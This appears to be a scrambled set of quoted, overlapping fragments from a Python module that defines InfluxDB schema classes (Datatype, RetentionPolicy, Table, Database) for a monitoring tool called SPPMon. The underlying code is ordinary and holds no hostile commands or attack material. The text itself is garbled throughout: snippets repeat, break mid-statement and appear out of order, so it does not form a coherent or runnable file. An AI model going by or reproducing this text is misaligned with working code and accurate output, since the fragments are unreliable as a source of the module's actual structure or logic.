None-Values", "retention_policy(self) -> RetentionPolicy: \"\"\"retention policy associated with this table\"\"\" return", "fields[key] = value elif(key in tags): tags[key] = value elif(key", "str) -> Table: \"\"\"Aquire a instance of a predefined table,", "@property def tables(self) -> Dict[str, Table]: \"\"\"Dict with table definitions", "retention policy shard duration for creation\") if(default is None): raise", "__str__(self) -> str: return f\"{self.database.name}.{self.name}\" def __repr__(self) -> str: return", "of all provided Retention Policies continuous_queries - Set of all", "= fields self.__tags: List[str] = tags self.__time_key: str = time_key", "def get_auto_datatype(value: Any) -> Datatype: \"\"\"get Datatype enum by value", "queries. fields[key] = value return (tags, fields, time_stamp) class Database:", "a timestamp. \"\"\" @property def fields(self) -> Dict[str, Datatype]: \"\"\"fields", "actualy timestamp saved time_stamp: Union[str, int, None] = None for", "table\"\"\" return self.__name @property def retention_policy(self) -> RetentionPolicy: \"\"\"retention policy", "Set[Queries.ContinuousQuery]: \"\"\"Set of all provided Continuous Queries\"\"\" return self.__continuous_queries @property", "will automatically insert the data in the right format. The", "associated with this table\"\"\" return self.__retention_policy @property def database(self) ->", "DB. Attributes name - name of RP database - associated", "f\"{self.database.name}.{self.retention_policy.name}.{self.name}\" def __repr__(self) -> str: return f\"Table: {self.name}\" def split_by_table_def(self,", "within this database Methods split_by_table_def - Split the given dict", "SppUtils @unique class Datatype(Enum): \"\"\" This enum differentiates between the", "value # if time_stamp_field is not used yet, overwrite sppmonCaptureTime", "table is declared within this database Methods split_by_table_def - Split", "TODO Untested, saves as Boolean within Influx. \"\"\" INT =", "duration for creation\") if(not replication): raise ValueError(\"need retention policy replication", "split\") # if table is not defined use default split", "from the DB. Attributes name - name of RP database", "else: ExceptionUtils.error_message(f\"Not all columns for table {self.name} are declared: {key}\")", "a warning. This function uses the tag/field and timestamp definiton", "replication): raise ValueError(\"need retention policy replication factor for creation\") if(not", "type is detected emits a warning and returns `NONE`. Arguments:", "= dict.fromkeys(self.tags, None) # what field should be recorded as", "key in time_stamp_field): continue else: ExceptionUtils.error_message(f\"Not all columns for table", "any of predefined time names if(key in time_stamp_field or key", "if(not fields): fields = {} if(not tags): tags = []", "tags self.__time_key: str = time_key self.__retention_policy = retention_policy # escape", "import Enum, unique import re import json from typing import", "hash(json.dumps(self.to_dict(), sort_keys=True)) class Table: \"\"\"Represents a measurement in influx. Contains", "name.replace(bad_character, '\\\\%c'% bad_character) self.__name: str = name def __str__(self) ->", "typ analysis \"\"\" NONE = type(None) \"\"\"Undeclared, only use as", "it is not the time_stamp_field time_overwrite_allowed = True # actualy", "\"\"\" @property def fields(self) -> Dict[str, Datatype]: \"\"\"fields of the", "self.__tables @property def retention_policies(self) -> Set[RetentionPolicy]: \"\"\"Set of all provided", "table \"\"\" return self.tables.get(table_name, Table(self, table_name)) def __str__(self) -> str:", "bad_character in self.__bad_measurement_characters: if(re.search(bad_character, name)): name = name.replace(bad_character, '\\\\%c'% bad_character)", "field name with datatype tags - tags as list of", "if(not self.fields): return InfluxUtils.default_split(mydict=mydict) # fill dicts # table.fields is", "str: \"\"\"name of the timestamp key\"\"\" return self.__time_key @property def", "Table: \"\"\"Represents a measurement in influx. Contains pre-defined tag and", "is not in the correct time format\") def to_dict(self) ->", "a helper and not of a big use. Methods: get_auto_datatype", "table if missing. \"\"\" @property def tables(self) -> Dict[str, Table]:", "causing problems! \"\"\" @staticmethod def get_auto_datatype(value: Any) -> Datatype: \"\"\"get", "Any) -> Datatype: \"\"\"get Datatype enum by value typ analysis.", "bool = False time_stamp = value # if time_stamp_field is", "-> Set[RetentionPolicy]: \"\"\"Set of all provided Retention Policies\"\"\" return self.__retention_policies", "@property def name(self) -> str: \"\"\"name of the Retention Policy\"\"\"", "order of the types within the enum is important: bool", "@property def shard_duration(self) -> str: \"\"\"Size of memory-groups. Default time", "import re import json from typing import Any, Dict, List,", "def split_by_table_def(self, mydict: Dict[str, Any]) -> Tuple[ Dict[str, Any], Dict[str,", "influx.influx_queries as Queries from utils.execption_utils import ExceptionUtils from utils.influx_utils import", "return self.__replication @property def shard_duration(self) -> str: \"\"\"Size of memory-groups.", "and timestamp definiton declared within this table. Arguments: self {Table}", "Influx. \"\"\" INT = int \"\"\"Appends a 'i' at end", "value typ analysis \"\"\" NONE = type(None) \"\"\"Undeclared, only use", "str: return self.name def __repr__(self) -> str: return f'Database: {self.name}'", "overwrite it. elif(key is time_stamp_field): time_overwrite_allowed: bool = False time_stamp", "\"\"\"retention policy associated with this table\"\"\" return self.__retention_policy @property def", "via name. Creates empty table if missing. \"\"\" @property def", "what field should be recorded as time time_stamp_field = self.time_key", "and table structures used for the influx database. Classes: Datatype", "If there are no fields declared, it will split by", "None]]: \"\"\"Split the given dict into a pre-defined set of", "used as reference\"\"\" return self.__name def __getitem__(self, table_name: str) ->", "Arguments: table_name {str} -- name of the table you want", "Set[RetentionPolicy]: \"\"\"Set of all provided Retention Policies\"\"\" return self.__retention_policies @property", "__getitem__ - [] access on the tables via name. Creates", "self.default } def __str__(self) -> str: return f\"{self.database.name}.{self.name}\" def __repr__(self)", "epoch timestamps, *NOT* for durations or counts. `TIME` is automatically", "is purged replication - How often the date is replicated", "str = name def __str__(self) -> str: return f\"{self.database.name}.{self.retention_policy.name}.{self.name}\" def", "ValueError(\"need retention policy default setting for creation\") self.__name = name", "is mixed with any other type.\"\"\" FLOAT = float \"\"\"Unchanged", "mydict: Dict[str, Any]) -> Tuple[ Dict[str, Any], Dict[str, Any], Union[str,", "time_stamp_field is highest priority. Do not overwrite it. elif(key is", "a dataset is deleted from the DB. Attributes name -", "str): self.__name: str = name self.__tables: Dict[str, Table] = {}", "return Datatype.NONE class RetentionPolicy: \"\"\"Represents a influxdb retention policy. By", "self.__continuous_queries @property def name(self) -> str: \"\"\"name of the database,", "return self.__retention_policies @property def continuous_queries(self) -> Set[Queries.ContinuousQuery]: \"\"\"Set of all", "factor for creation\") if(not shard_duration): raise ValueError(\"need retention policy shard", "not in the correct time format\") try: # str due", "-> str: \"\"\"name of the timestamp key\"\"\" return self.__time_key @property", "= shard_duration self.__default = default try: # str due usage", "\"\"\"those chars need to be escaped within a measurement/table name\"\"\"", "return self.__database @property def duration(self) -> str: \"\"\"time until the", "return f\"{self.database.name}.{self.name}\" def __repr__(self) -> str: return f\"Retention Policy: {self.name}\"", "return f\"{self.database.name}.{self.retention_policy.name}.{self.name}\" def __repr__(self) -> str: return f\"Table: {self.name}\" def", "int: return hash(json.dumps(self.to_dict(), sort_keys=True)) class Table: \"\"\"Represents a measurement in", "saved time_stamp: Union[str, int, None] = None for (key, value)", "Datatype: if(enum is Datatype.TIMESTAMP): continue if(isinstance(value, enum.value)): return enum ExceptionUtils.error_message(f\"No", "with floats. If no type is detected emits a warning", "timestamp. \"\"\" @property def fields(self) -> Dict[str, Datatype]: \"\"\"fields of", "int, but a int is not a bool. Important: only", "highest priority. Do not overwrite it. elif(key is time_stamp_field): time_overwrite_allowed:", "None: if(not name): raise ValueError(\"need retention policy name for creation\")", "@property def time_key(self) -> str: \"\"\"name of the timestamp key\"\"\"", "fields = {} if(not tags): tags = [] if(not retention_policy):", "Any]) -> Tuple[ Dict[str, Any], Dict[str, Any], Union[str, int, None]]:", "and empty strings are ignored. If there are no fields", "by value typ analysis. Usage should be avoided. Only use", "should be avoided. Only use if no datatype is declared.", "__repr__(self) -> str: return f\"Retention Policy: {self.name}\" def __eq__(self, o:", "of the table, datatype always string\"\"\" return self.__tags @property def", "the Retention Policy\"\"\" return self.__name @property def database(self) -> Database:", "'replicaN': self.__replication, 'default': self.default } def __str__(self) -> str: return", "database - table is declared within this database Methods split_by_table_def", "time_stamp_field): time_overwrite_allowed: bool = False time_stamp = value # if", "= value # time_stamp_field is highest priority. Do not overwrite", "Instance of a predefined table, otherwise new empty table \"\"\"", "within the init method. Attributes name - name of the", "Dict[str, Table]: \"\"\"Dict with table definitions to look up\"\"\" return", "Type is just a placeholder, do not set to int", "in influx. Contains pre-defined tag and field definitions. Attributes name", "duration for retention policy {name} is not in the correct", "table definitions to look up\"\"\" return self.__tables @property def retention_policies(self)", "a dict out of the values, able to compare to", "__init__(self, database: Database, name: str, fields: Dict[str, Datatype] = None,", "def __repr__(self) -> str: return f\"Table: {self.name}\" def split_by_table_def(self, mydict:", "allowed characters in Measurement for bad_character in self.__bad_measurement_characters: if(re.search(bad_character, name)):", "name of the database tables - tables with predefined tags", "problems! \"\"\" @staticmethod def get_auto_datatype(value: Any) -> Datatype: \"\"\"get Datatype", "of tags, fields and a timestamp. None-Values and empty strings", "retention policy {name} is not in the correct time format\")", "List[str]: \"\"\"tags of the table, datatype always string\"\"\" return self.__tags", "\"\"\"name of the database, also used as reference\"\"\" return self.__name", "False) -> None: if(not name): raise ValueError(\"need retention policy name", "@property def database(self) -> Database: \"\"\"associated database\"\"\" return self.__database @property", "raise ValueError(\"need retention policy replication factor for creation\") if(not shard_duration):", "self.__retention_policies @property def continuous_queries(self) -> Set[Queries.ContinuousQuery]: \"\"\"Set of all provided", "Contains pre-defined tag and field definitions. Attributes name - name", "automatically insert the data in the right format. The order", "timestamp \"\"\" if(not mydict): raise ValueError(\"need at least one value", "\"\"\"name of the timestamp key\"\"\" return self.__time_key @property def name(self)", "- Set of all provided Continuous Queries Methods __getitem__ -", "RP Methods to_dict - creates a dict out of the", "if otherwise None if(time_stamp is None and key == SppUtils.capture_time_key):", "analysis \"\"\" NONE = type(None) \"\"\"Undeclared, only use as a", "for creation\") self.__name = name self.__database = database self.__replication =", "__eq__(self, o: object) -> bool: if(isinstance(o, RetentionPolicy)): return o.to_dict() ==", "all table definitions within the init method. Attributes name -", "self.name, 'duration': self.duration, 'shardGroupDuration': self.__shard_duration, 'replicaN': self.__replication, 'default': self.default }", "Returns: Table -- Instance of a predefined table, otherwise new", "Union import influx.influx_queries as Queries from utils.execption_utils import ExceptionUtils from", "time_stamp_field is not used yet, overwrite sppmonCaptureTime or others elif(time_overwrite_allowed):", "to int - causing problems! \"\"\" @staticmethod def get_auto_datatype(value: Any)", "whether this is the default RP Methods to_dict - creates", "database\"\"\" return self.__database @property def duration(self) -> str: \"\"\"time until", "predefined table, otherwise new empty table \"\"\" return self.tables.get(table_name, Table(self,", "str due usage of method self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False)", "time_key(self) -> str: \"\"\"name of the timestamp key\"\"\" return self.__time_key", "be None\") if(not fields): fields = {} if(not tags): tags", "key in InfluxUtils.time_key_names): # sppmonCTS has lowest priority, only set", "int, bool, None]} -- Value to be analyzed Returns: Datatype", "def __eq__(self, o: object) -> bool: if(isinstance(o, RetentionPolicy)): return o.to_dict()", "if(isinstance(value, enum.value)): return enum ExceptionUtils.error_message(f\"No auto type found for {value}\")", "type. Mixing with ints works.\"\"\" TIMESTAMP = type(int) \"\"\"Automatic transform", "is None and key == SppUtils.capture_time_key): time_stamp = value #", "Queries from utils.execption_utils import ExceptionUtils from utils.influx_utils import InfluxUtils from", "is always 1\"\"\" return self.__replication @property def shard_duration(self) -> str:", "value if it matches any of predefined time names if(key", "\"\"\" from __future__ import annotations from enum import Enum, unique", "or key in InfluxUtils.time_key_names): # sppmonCTS has lowest priority, only", "creation\") if(not shard_duration): raise ValueError(\"need retention policy shard duration for", "[] access on the tables via name. Creates empty table", "of the table\"\"\" return self.__name @property def retention_policy(self) -> RetentionPolicy:", "time_overwrite_allowed: bool = False time_stamp = value # if time_stamp_field", "single_vals=False) except ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"shard duration for", "-> str: \"\"\"name of the database, also used as reference\"\"\"", "float \"\"\"Unchanged value. Default Influx numeric data type. Mixing with", "use. Methods: get_auto_datatype - get Datatype enum by value typ", "be analyzed Returns: Datatype -- type of value or `NONE`.", "1 db instance so replication is always 1\"\"\" return self.__replication", "None) tags: Dict[str, Any] = dict.fromkeys(self.tags, None) # what field", "self.fields): return InfluxUtils.default_split(mydict=mydict) # fill dicts # table.fields is a", "new empty table \"\"\" return self.tables.get(table_name, Table(self, table_name)) def __str__(self)", "\"\"\"Special symbols and \\\" will be escaped.\"\"\" BOOL = bool", "= dict.fromkeys(self.fields.keys(), None) tags: Dict[str, Any] = dict.fromkeys(self.tags, None) #", "self.__bad_measurement_characters: if(re.search(bad_character, name)): name = name.replace(bad_character, '\\\\%c'% bad_character) self.__name: str", "class Database: \"\"\" Represents a instance of influx database. Define", "def duration(self) -> str: \"\"\"time until the data is purged\"\"\"", "InfluxUtils from utils.spp_utils import SppUtils @unique class Datatype(Enum): \"\"\" This", "one value in dict to split\") # if table is", "key, value is datatype\"\"\" return self.__fields @property def tags(self) ->", "& fields retention_policies - Set of all provided Retention Policies", "decides what to take\"\"\" return self.__shard_duration @property def default(self) ->", "enum by value typ analysis \"\"\" NONE = type(None) \"\"\"Undeclared,", "is Datatype.TIMESTAMP): continue if(isinstance(value, enum.value)): return enum ExceptionUtils.error_message(f\"No auto type", "duration or counter. Caution: Type is just a placeholder, do", "type(int) \"\"\"Automatic transform a timestamp into seconds. Important: Only use", "of time a dataset is deleted from the DB. Attributes", "which ammount of time a dataset is deleted from the", "'name': self.name, 'duration': self.duration, 'shardGroupDuration': self.__shard_duration, 'replicaN': self.__replication, 'default': self.default", "= default try: # str due usage of method self.__duration:", "RetentionPolicy = None) -> None: if(not database): raise ValueError(\"need database", "and a timestamp. None-Values and empty strings are ignored. If", "typ analysis. Usage should be avoided. Only use if no", "field retention_policy - retention policy associated with this table database", "import ExceptionUtils from utils.influx_utils import InfluxUtils from utils.spp_utils import SppUtils", "to be escaped within a measurement/table name\"\"\" def __init__(self, database:", "want to aquire Returns: Table -- Instance of a predefined", "time_key - key name of the timestamp field retention_policy -", "use if no datatype is declared. It skips time-type and", "counts. `TIME` is automatically converted into second format. Note: The", "correct time format\") try: # str due usage of method", "str: \"\"\"name of the table\"\"\" return self.__name @property def retention_policy(self)", "None, time_key: str = 'time', retention_policy: RetentionPolicy = None) ->", "method self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False) except ValueError as error:", "Continuous Queries\"\"\" return self.__continuous_queries @property def name(self) -> str: \"\"\"name", "retention policy. By this policy it is declared afer which", "time until the data is purged replication - How often", "- Split the given dict into a pre-defined set of", "\"\"\" This enum differentiates between the different Influx-Types. By declaring", "Any], Union[str, int, None]]: \"\"\"Split the given dict into a", "time names if(key in time_stamp_field or key in InfluxUtils.time_key_names): #", "-> RetentionPolicy: \"\"\"retention policy associated with this table\"\"\" return self.__retention_policy", "= False) -> None: if(not name): raise ValueError(\"need retention policy", "None): raise ValueError(\"need retention policy default setting for creation\") self.__name", "bool]]: \"\"\"Used to create a dict out of the values,", "if no overwrite allowed, continue and drop field else: continue", "int, bool]]: \"\"\"Used to create a dict out of the", "just a helper and not of a big use. Methods:", "List[str] = [' ', ','] \"\"\"those chars need to be", "TIMESTAMP = type(int) \"\"\"Automatic transform a timestamp into seconds. Important:", "Datatype.TIMESTAMP): continue if(isinstance(value, enum.value)): return enum ExceptionUtils.error_message(f\"No auto type found", "str: return f\"{self.database.name}.{self.retention_policy.name}.{self.name}\" def __repr__(self) -> str: return f\"Table: {self.name}\"", "timestamp saved time_stamp: Union[str, int, None] = None for (key,", "priority, only set if otherwise None if(time_stamp is None and", "replication(self) -> int: \"\"\"How often the date is replicated. We", "and fields mydict {Dict[str, Any]} -- dict with colums as", "Set of all provided Retention Policies continuous_queries - Set of", "to create table\") if(not name): raise ValueError(\"need str name to", "if(not database): raise ValueError(\"need database to create table\") if(not name):", "of the Retention Policy\"\"\" return self.__name @property def database(self) ->", "-> int: \"\"\"How often the date is replicated. We only", "need the keys fields: Dict[str, Any] = dict.fromkeys(self.fields.keys(), None) tags:", "a placeholder, do not set to int - causing problems!", "a subtype of int. TODO Untested, saves as Boolean within", "def __repr__(self) -> str: return f\"Retention Policy: {self.name}\" def __eq__(self,", "= name.replace(bad_character, '\\\\%c'% bad_character) self.__name: str = name def __str__(self)", "field else: continue # Otherwise check for Keys or Fields", "if ints are mixed with floats. If no type is", "Important: only use `TIME` for epoch timestamps, *NOT* for durations", "import influx.influx_queries as Queries from utils.execption_utils import ExceptionUtils from utils.influx_utils", "str: \"\"\"Size of memory-groups. Default time is 0s, then the", "INT = int \"\"\"Appends a 'i' at end of number", "given dict into a pre-defined set of tags, fields and", "@staticmethod def get_auto_datatype(value: Any) -> Datatype: \"\"\"get Datatype enum by", "@property def database(self) -> Database: \"\"\"table is declared within this", "= value elif(key in tags): tags[key] = value elif(key in", "# before key+\"MISSING\" : Removed to avoid death-circle on repeated", "avoid death-circle on repeated queries. fields[key] = value return (tags,", "influxdb retention policy. By this policy it is declared afer", "is None): raise ValueError(\"need retention policy default setting for creation\")", "name - name of table fields - dict of field", "tags, fields, timestamp \"\"\" if(not mydict): raise ValueError(\"need at least", "Fields if(key in fields): fields[key] = value elif(key in tags):", "str: return f\"{self.database.name}.{self.name}\" def __repr__(self) -> str: return f\"Retention Policy:", "policy name for creation\") if(not database): raise ValueError(\"need retention policy", "definitions. Attributes name - name of table fields - dict", "We only have 1 db instance so replication is always", "\"\"\"Automatic transform a timestamp into seconds. Important: Only use for", "the enum is important: bool is a int, but a", "a empty table if it was not defined. []-Access. Arguments:", "RetentionPolicy: \"\"\"Represents a influxdb retention policy. By this policy it", "self.__retention_policy = retention_policy # escape not allowed characters in Measurement", "enum is important: bool is a int, but a int", "need to be escaped within a measurement/table name\"\"\" def __init__(self,", "time_stamp) class Database: \"\"\" Represents a instance of influx database.", "by value typ analysis \"\"\" NONE = type(None) \"\"\"Undeclared, only", "raise ValueError(\"time key cannot be None\") if(not fields): fields =", "policy associated with this table\"\"\" return self.__retention_policy @property def database(self)", "collums will produce a warning. This function uses the tag/field", "for (key, value) in mydict.items(): # Ignore empty entrys if(value", "memory-groups. Default time is 0s, then the db decides what", "is deleted from the DB. Attributes name - name of", "out of the values \"\"\" @property def name(self) -> str:", "is not the time_stamp_field time_overwrite_allowed = True # actualy timestamp", "def to_dict(self) -> Dict[str, Union[str, int, bool]]: \"\"\"Used to create", "has lowest priority, only set if otherwise None if(time_stamp is", "key name of the timestamp field retention_policy - retention policy", "influxdb-created dict\"\"\" return { 'name': self.name, 'duration': self.duration, 'shardGroupDuration': self.__shard_duration,", "Table RetentionPolicy \"\"\" from __future__ import annotations from enum import", "= float \"\"\"Unchanged value. Default Influx numeric data type. Mixing", "setting for creation\") self.__name = name self.__database = database self.__replication", "} def __str__(self) -> str: return f\"{self.database.name}.{self.name}\" def __repr__(self) ->", "Union[str, int, bool]]: \"\"\"Used to create a dict out of", "mydict.items(): # Ignore empty entrys if(value is None or (isinstance(value,", "of the database, also used as reference\"\"\" return self.__name def", "tags - tags as list of str time_key - key", "*NOT* for durations or counts. `TIME` is automatically converted into", "-> int: return hash(json.dumps(self.to_dict(), sort_keys=True)) class Table: \"\"\"Represents a measurement", "Table]: \"\"\"Dict with table definitions to look up\"\"\" return self.__tables", "enum.value)): return enum ExceptionUtils.error_message(f\"No auto type found for {value}\") return", "__future__ import annotations from enum import Enum, unique import re", "database Methods split_by_table_def - Split the given dict into a", "f\"Table: {self.name}\" def split_by_table_def(self, mydict: Dict[str, Any]) -> Tuple[ Dict[str,", "with table definitions to look up\"\"\" return self.__tables @property def", "Epoch timestamps, not duration or counter. Caution: Type is just", "bool \"\"\"Any boolean, be aware it is a subtype of", "table.fields is a dict, we only need the keys fields:", "self.tables.get(table_name, Table(self, table_name)) def __str__(self) -> str: return self.name def", "the different Influx-Types. By declaring the type SPPMon will automatically", "pre-defined set of tags, fields and a timestamp. \"\"\" @property", "creation\") if(not replication): raise ValueError(\"need retention policy replication factor for", "(Dict[str, Any], Dict[str, Any], int) -- Tuple of: tags, fields,", "- whether this is the default RP Methods to_dict -", "name: str): self.__name: str = name self.__tables: Dict[str, Table] =", "self.__duration @property def replication(self) -> int: \"\"\"How often the date", "if(not name): raise ValueError(\"need retention policy name for creation\") if(not", "None or (isinstance(value, str) and not value)): continue # Check", "ignored. If there are no fields declared, it will split", "elif(key in InfluxUtils.time_key_names or key in time_stamp_field): continue else: ExceptionUtils.error_message(f\"Not", "timestamps, *NOT* for durations or counts. `TIME` is automatically converted", "with this table database - table is declared within this", "None and key == SppUtils.capture_time_key): time_stamp = value # time_stamp_field", "it. elif(key is time_stamp_field): time_overwrite_allowed: bool = False time_stamp =", "is 0s, then the db decides what to take\"\"\" return", "unique import re import json from typing import Any, Dict,", "default - whether this is the default RP Methods to_dict", "converted into second format. Note: The return type is just", "Any], Dict[str, Any], int) -- Tuple of: tags, fields, timestamp", "- time until the data is purged replication - How", "= replication self.__shard_duration = shard_duration self.__default = default try: #", "ValueError(f\"duration for retention policy {name} is not in the correct", "raise ValueError(\"need retention policy name for creation\") if(not database): raise", "InfluxUtils.default_split(mydict=mydict) # fill dicts # table.fields is a dict, we", "- get Datatype enum by value typ analysis \"\"\" NONE", "{self.name}\" def split_by_table_def(self, mydict: Dict[str, Any]) -> Tuple[ Dict[str, Any],", "important: bool is a int, but a int is not", "cannot be None\") if(not fields): fields = {} if(not tags):", "will split by a default pattern. Undeclared collums will produce", "self.to_dict() return False def __hash__(self) -> int: return hash(json.dumps(self.to_dict(), sort_keys=True))", "if it matches any of predefined time names if(key in", "within Influx. \"\"\" INT = int \"\"\"Appends a 'i' at", "`NONE`. Arguments: value {Union[str, float, int, bool, None]} -- Value", "Check timestamp value if it matches any of predefined time", "in InfluxUtils.time_key_names): # sppmonCTS has lowest priority, only set if", "the data is purged\"\"\" return self.__duration @property def replication(self) ->", "declared: {key}\") # before key+\"MISSING\" : Removed to avoid death-circle", "This enum differentiates between the different Influx-Types. By declaring the", "str: return f'Database: {self.name}' def __init__(self, name: str): self.__name: str", "empty table if missing. \"\"\" @property def tables(self) -> Dict[str,", "@property def name(self) -> str: \"\"\"name of the database, also", "str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False) except ValueError as error: ExceptionUtils.exception_info(error) raise", "emits a warning and returns `NONE`. Arguments: value {Union[str, float,", "the type SPPMon will automatically insert the data in the", "bool = False) -> None: if(not name): raise ValueError(\"need retention", "self.__shard_duration, 'replicaN': self.__replication, 'default': self.default } def __str__(self) -> str:", "time_stamp_field or key in InfluxUtils.time_key_names): # sppmonCTS has lowest priority,", "ints works.\"\"\" TIMESTAMP = type(int) \"\"\"Automatic transform a timestamp into", "str) and not value)): continue # Check timestamp value if", "-> Dict[str, Union[str, int, bool]]: \"\"\"Used to create a dict", "Continuous Queries Methods __getitem__ - [] access on the tables", "if it is not the time_stamp_field time_overwrite_allowed = True #", "of the timestamp field retention_policy - retention policy associated with", "death-circle on repeated queries. fields[key] = value return (tags, fields,", "value # if no overwrite allowed, continue and drop field", "Dict[str, Any] = dict.fromkeys(self.tags, None) # what field should be", "= value return (tags, fields, time_stamp) class Database: \"\"\" Represents", "default try: # str due usage of method self.__duration: str", "of type dict. Returns: (Dict[str, Any], Dict[str, Any], int) --", "lowest priority, only set if otherwise None if(time_stamp is None", "tags[key] = value elif(key in InfluxUtils.time_key_names or key in time_stamp_field):", "to look up\"\"\" return self.__tables @property def retention_policies(self) -> Set[RetentionPolicy]:", "used for the influx database. Classes: Datatype Database Table RetentionPolicy", "str = name self.__tables: Dict[str, Table] = {} self.__retention_policies: Set[RetentionPolicy]", "a influxdb retention policy. By this policy it is declared", "# Check timestamp value if it matches any of predefined", "use as a placeholder.\"\"\" STRING = str \"\"\"Special symbols and", "found for {value}\") return Datatype.NONE class RetentionPolicy: \"\"\"Represents a influxdb", "table database - table is declared within this database Methods", "key == SppUtils.capture_time_key): time_stamp = value # time_stamp_field is highest", "is a int, but a int is not a bool.", "@property def duration(self) -> str: \"\"\"time until the data is", "table, returns a empty table if it was not defined.", "ValueError(\"time key cannot be None\") if(not fields): fields = {}", "policy default setting for creation\") self.__name = name self.__database =", "aquire Returns: Table -- Instance of a predefined table, otherwise", "= True # actualy timestamp saved time_stamp: Union[str, int, None]", "the default RP\"\"\" return self.__default def __init__(self, name: str, database:", "is declared within this database\"\"\" return self.__database __bad_measurement_characters: List[str] =", "str: \"\"\"name of the database, also used as reference\"\"\" return", "self.__shard_duration = shard_duration self.__default = default try: # str due", "date is replicated. We only have 1 db instance so", "ValueError(\"need retention policy shard duration for creation\") if(default is None):", "entrys if(value is None or (isinstance(value, str) and not value)):", "= retention_policy # escape not allowed characters in Measurement for", "-> Dict[str, Table]: \"\"\"Dict with table definitions to look up\"\"\"", "-> str: return f'Database: {self.name}' def __init__(self, name: str): self.__name:", "a predefined table, otherwise new empty table \"\"\" return self.tables.get(table_name,", "database - associated database duration - time until the data", "Mixing with ints works.\"\"\" TIMESTAMP = type(int) \"\"\"Automatic transform a", "NONE = type(None) \"\"\"Undeclared, only use as a placeholder.\"\"\" STRING", "as error: ExceptionUtils.exception_info(error) raise ValueError(f\"duration for retention policy {name} is", "Datatype enum by value typ analysis \"\"\" NONE = type(None)", "table\"\"\" return self.__retention_policy @property def database(self) -> Database: \"\"\"table is", "empty strings are ignored. If there are no fields declared,", "self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False) except ValueError as error: ExceptionUtils.exception_info(error)", "influx database. Define all table definitions within the init method.", "shard_duration(self) -> str: \"\"\"Size of memory-groups. Default time is 0s,", "\"\"\" NONE = type(None) \"\"\"Undeclared, only use as a placeholder.\"\"\"", "fields(self) -> Dict[str, Datatype]: \"\"\"fields of the table, name is", "default setting for creation\") self.__name = name self.__database = database", "{value}\") return Datatype.NONE class RetentionPolicy: \"\"\"Represents a influxdb retention policy.", "False time_stamp = value # if time_stamp_field is not used", "table, name is key, value is datatype\"\"\" return self.__fields @property", "- causing problems! \"\"\" @staticmethod def get_auto_datatype(value: Any) -> Datatype:", "to avoid death-circle on repeated queries. fields[key] = value return", "name\"\"\" def __init__(self, database: Database, name: str, fields: Dict[str, Datatype]", "value {Union[str, float, int, bool, None]} -- Value to be", "be aware it is a subtype of int. TODO Untested,", "counter. Caution: Type is just a placeholder, do not set", "as a placeholder.\"\"\" STRING = str \"\"\"Special symbols and \\\"", "= [' ', ','] \"\"\"those chars need to be escaped", "a timestamp. None-Values and empty strings are ignored. If there", "tags and fields mydict {Dict[str, Any]} -- dict with colums", "'duration': self.duration, 'shardGroupDuration': self.__shard_duration, 'replicaN': self.__replication, 'default': self.default } def", "tags = [] if(not retention_policy): retention_policy = next(filter(lambda rp: rp.default,", "self.__name = name self.__database = database self.__replication = replication self.__shard_duration", "not used yet, overwrite sppmonCaptureTime or others elif(time_overwrite_allowed): time_stamp =", "method self.__duration: str = InfluxUtils.transform_time_literal(duration, single_vals=False) except ValueError as error:", "by a default pattern. Undeclared collums will produce a warning.", "ExceptionUtils.error_message(f\"No auto type found for {value}\") return Datatype.NONE class RetentionPolicy:", "policy replication factor for creation\") if(not shard_duration): raise ValueError(\"need retention", "str, database: Database, duration: str, replication: int = 1, shard_duration:", "drop field else: continue # Otherwise check for Keys or", "to create table\") if(not time_key): raise ValueError(\"time key cannot be", "is not used yet, overwrite sppmonCaptureTime or others elif(time_overwrite_allowed): time_stamp", "annotations from enum import Enum, unique import re import json", "= None, time_key: str = 'time', retention_policy: RetentionPolicy = None)", "= {} self.__retention_policies: Set[RetentionPolicy] = set() self.__continuous_queries: Set[Queries.ContinuousQuery] = set()", "# Otherwise check for Keys or Fields if(key in fields):", "single_vals=False) except ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"duration for retention", "name of RP database - associated database duration - time", "# Ignore empty entrys if(value is None or (isinstance(value, str)", "differentiates between the different Influx-Types. By declaring the type SPPMon", "Any], Dict[str, Any], Union[str, int, None]]: \"\"\"Split the given dict", "RetentionPolicy: \"\"\"retention policy associated with this table\"\"\" return self.__retention_policy @property", "use default split if(not self.fields): return InfluxUtils.default_split(mydict=mydict) # fill dicts", "instance so replication is always 1\"\"\" return self.__replication @property def", "will be escaped.\"\"\" BOOL = bool \"\"\"Any boolean, be aware", "\"\"\"Size of memory-groups. Default time is 0s, then the db", "fields self.__tags: List[str] = tags self.__time_key: str = time_key self.__retention_policy", "self.__time_key @property def name(self) -> str: \"\"\"name of the table\"\"\"", "if(not shard_duration): raise ValueError(\"need retention policy shard duration for creation\")", "to aquire Returns: Table -- Instance of a predefined table,", "ValueError(\"need str name to create table\") if(not time_key): raise ValueError(\"time", "set if otherwise None if(time_stamp is None and key ==", "database\"\"\" return self.__database __bad_measurement_characters: List[str] = [' ', ','] \"\"\"those", "if(not tags): tags = [] if(not retention_policy): retention_policy = next(filter(lambda", "the values, able to compare to influxdb-created dict\"\"\" return {", "-- Instance of a predefined table, otherwise new empty table", "= bool \"\"\"Any boolean, be aware it is a subtype", "fields retention_policies - Set of all provided Retention Policies continuous_queries", "of all provided Continuous Queries\"\"\" return self.__continuous_queries @property def name(self)", "{ 'name': self.name, 'duration': self.duration, 'shardGroupDuration': self.__shard_duration, 'replicaN': self.__replication, 'default':", "timestamp field retention_policy - retention policy associated with this table", "None\") if(not fields): fields = {} if(not tags): tags =", "fields - dict of field name with datatype tags -", "the init method. Attributes name - name of the database", "to influxdb-created dict\"\"\" return { 'name': self.name, 'duration': self.duration, 'shardGroupDuration':", "= None, tags: List[str] = None, time_key: str = 'time',", "value)): continue # Check timestamp value if it matches any", "data is purged\"\"\" return self.__duration @property def replication(self) -> int:", "str = InfluxUtils.transform_time_literal(duration, single_vals=False) except ValueError as error: ExceptionUtils.exception_info(error) raise", "name of table fields - dict of field name with", "retention_policy # escape not allowed characters in Measurement for bad_character", "overwrite sppmonCaptureTime or others elif(time_overwrite_allowed): time_stamp = value # if", "shard_duration: str = \"0s\", default: bool = False) -> None:", "Dict[str, Any] = dict.fromkeys(self.fields.keys(), None) tags: Dict[str, Any] = 